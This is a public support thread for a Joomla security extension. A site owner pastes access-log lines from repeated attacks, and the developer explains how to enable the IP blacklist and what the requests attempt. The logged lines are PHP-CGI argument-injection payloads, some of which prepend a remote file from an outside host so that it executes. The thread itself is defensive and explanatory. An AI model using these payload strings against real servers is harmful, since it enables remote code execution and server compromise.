Support

Admin Tools

#14143 attack despite IP-banning

Posted in ‘Admin Tools for Joomla! 4 & 5’
This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by nicholas on Thursday, 22 November 2012 08:33 CST

Thursday, 22 November 2012 07:46 CST

amorim

Hi Nicholas, a few days ago hat an attack and put the IP on the black list. (173.45.104.226 Toledo, Ohio)

Tonight there was another attempt coming from the same IP number.

How is this possible? Did I do anything wrong? Or is this not coming from the IP address above?

I see one of the codes used includes the IP 178.63.8.192, belonging to HetznerΒ OnlineΒ AG in Germany (see log copies below). By chance I know them because I have had a lot of spam coming from their network.

Any hint what's going on – and what I can do to block the attacker?

Thanks!

First attack:

/index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=/proc/self/environ

/?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://178.63.8.214/echo.txt

/?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=/proc/self/environ

Β 

Second atack:

/?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://178.63.8.214/echo.txt

/?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=/proc/self/environ

/index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=/proc/self/environ



Thursday, 22 November 2012 07:49 CST

nicholas

Have you enabled the IP blacklist feature in Admin Tools' Web Application Firewall configuration page?

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Thursday, 22 November 2012 07:58 CST

amorim

Yes, please see screenshot.

Thursday, 22 November 2012 08:00 CST

nicholas

No, this is not what I mean. Go to Admin Tools, Web Application Firewall, Configure WAF. Find the "Disallow site access to IPs in Blacklist" option (second from top). By default it's set to No which means that Admin Tools will ignore your blacklist entries. Set it to Yes and click on Save & Close. Now the blacklist is active.

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Thursday, 22 November 2012 08:05 CST

amorim

Thanks, it was not active. Sorry.

But what does this second IP "178.63.8.214/echo.txt" mean? What is this guy up to?

Thursday, 22 November 2012 08:11 CST

nicholas

You're welcome!

Now, regarding the hack, it tries to exploit a bug in ancient PHP-CGI versions. You see all those -dSOMETHING=WHATEVER things? He's trying to pass php.ini options as command line parameters to the PHP-CGI binary. One of them is used to automatically prefix (a.k.a. "prepend" – that's a dev word, it doesn't really exist in English) a piece of code to all .php files. The code file it asks to load is http://178.63.8.214/echo.txt. Normally that is a piece of malicious code which gets executed and compromises your server. Of course that particular script kiddie is such a noob that his URL times out. Even if he did manage to get his exploit across, it would still fall flat on its ass because he has no idea what the heck he's doing. Oh, and don't worry. That security hole was patched half a decade ago... So, yeah, it looks like you have a kid with too much time and too little knowledge on his hands.

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Thursday, 22 November 2012 08:28 CST

amorim

Thanks again for your wisdom, keep up with the good work and have a great weekend!

Thursday, 22 November 2012 08:33 CST

nicholas

You're welcome!

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Support Information

Working hours: We are open Monday to Friday, 9am to 7pm Cyprus timezone (EET / EEST). Support is provided by the same developers writing the software, all of which live in Europe. You can still file tickets outside of our working hours, but we cannot respond to them until we're back at the office.

Support policy: We would like to kindly inform you that when using our support you have already agreed to the Support Policy which is part of our Terms of Service. Thank you for your understanding and for helping us help you!